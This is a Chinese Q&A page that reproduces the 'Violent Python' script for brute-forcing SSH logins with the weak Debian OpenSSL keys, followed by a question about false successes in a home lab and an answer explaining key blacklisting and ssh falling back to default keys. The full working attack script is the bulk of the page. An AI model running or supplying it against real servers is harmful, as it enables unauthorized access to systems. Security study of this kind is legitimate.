弱Debian SSH密钥Python脚本加密验证日志

2024-09-30 20:25:32 发布

您现在位置:Python中文网/ 问答频道 /正文
7814 3

所以我在读这本很棒的书,“暴力Python”。在第2章中,有一个Python脚本,它使用私钥向Debian机器或任何运行SSH服务器的机器进行身份验证,该服务器上有用户,但没有强私钥。以下是脚本:

#! /usr/bin/env python

import pexpect
import optparse
import os
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

def connect(user, host, keyfile, release):
    global Stop
    global Fails
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + \
                  '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, \
                            ssh_newkey, conn_closed, '$', '#',])
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            connection_lock.release()

def main():
    parser = optparse.OptionParser('usage%prog -H ' + \
                                   '<target host> -u <user> -d <directory>')
    parser.add_option('-H', dest='tgtHost', type='string', \
                      help='specify target host')
    parser.add_option('-d', dest='passDir', type='string', \
                      help='specify directory with keys')
    parser.add_option('-u', dest='user', type='string', \
                      help='specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passDir = options.passDir
    user = options.user
    if host == None or passDir == None or user == None:
        print parser.usage
        exit(0)

    for filename in os.listdir(passDir):
        if Stop:
            print '[*] Exiting: Key Found.'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: '+ \
                  'Too Many Connections Closed By Remote Host.'
            print '[!] Adjust number of simultaneous threads.'
            exit(0)

        connection_lock.acquire()
        fullpath = os.path.join(passDir, filename)
        print '[-] Testing keyfile ' + str(fullpath)
        t = Thread(target=connect, \
                   args=(user, host, fullpath, True))
        child = t.start()

if __name__ == '__main__':
    main()

我发现了一个奇怪的基于我的内部脚本的拷贝,我发现了一个很脆弱的内部脚本。我不知道为什么它会在操作系统上找到多个易受攻击的密钥。当我运行这个脚本时,我指定1)一个主机,2)一个用户名,3)一个目录,里面装满了HD Moore生成的私钥。我不得不使用wayback机器来获得他为2048强度的非对称算法生成的RSA私钥。在

输出示例:

^{pr2}$

不管怎么说,为什么脚本说它在我的Debian Kali虚拟机(VM)上为我的用户名找到了许多私钥?我试图使用ssh -irsa/2048/0002d5af29276c95a49dc2ab3b506707-23747 root@192.168.1.11 -o PasswordAuthentication=no命令使用明显易受攻击的私钥登录,但没有成功。为什么不起作用?Python脚本实际上不是在做它所说的事情吗?有人用X光眼镜吗?让我继续。。。在

然后我检查了我的debiankali虚拟机上的/var/log/auth.log,它有一些有趣而神秘的条目。日志上写着,Public key <Hexadecimal colon separated key> from <IP> blacklisted (see ssh-vulnkey(1))

我阅读了DebianKali操作系统上ssh-vulnkey的手册页,发现这个程序可以在计算机上找到易受攻击的密钥。我试着用-v verbose选项运行这个程序,发现一些密钥显然很容易受到攻击,尽管我不明白f键是怎么回事。在

对于1)为什么脚本返回成功找到密钥的结果和2)黑名单中的auth.log消息意味着什么,有人有一个简单易懂的解释吗?另外,3)如果它发现一个易受攻击的密钥,为什么我不能使用该密钥登录到我的计算机?在

另外,是否应该将其移动到information-security?在

邪恶的Python脚本:

奥康纳,TJ(2012-12-28)。暴力Python:黑客,法医分析师,渗透测试人员和安全工程师的食谱。爱思唯尔科学。Kindle版。在


Tags: import脚本childhostparserif密钥ssh
1条回答
网友
1楼 · 发布于 2024-09-30 20:25:32

据我所知,脚本只是遍历目录并尝试将它们用作连接到给定SSH服务器的密钥。这是在线程中完成的,因此输出的顺序不是确定的。因为在启动新线程之前,我们会检查全局Stop标志是否为True,因此可能会发生并非所有文件都被检查的情况,因为之前的一个线程已经成功完成并设置了该标志。这就是为什么它报告说它找到了一个密钥。在

您的SSH守护程序黑名单弱密钥是由OpenSSL的损坏版本生成的。这是件好事,你可以读到它here。这也是为什么你不能登录。在

ssh自动返回到在配置目录中查找有效密钥。所以连接确实成功了,但是您的命令行参数被忽略了。尝试使用-vvv运行命令并观察输出:

$ ssh user@host -i not-a-key -o PasswordAuthentication=no -vvv
[...]
debug1: identity file /path/to/not-a-key type -1
[...]

相关问题 更多 >

    编程相关推荐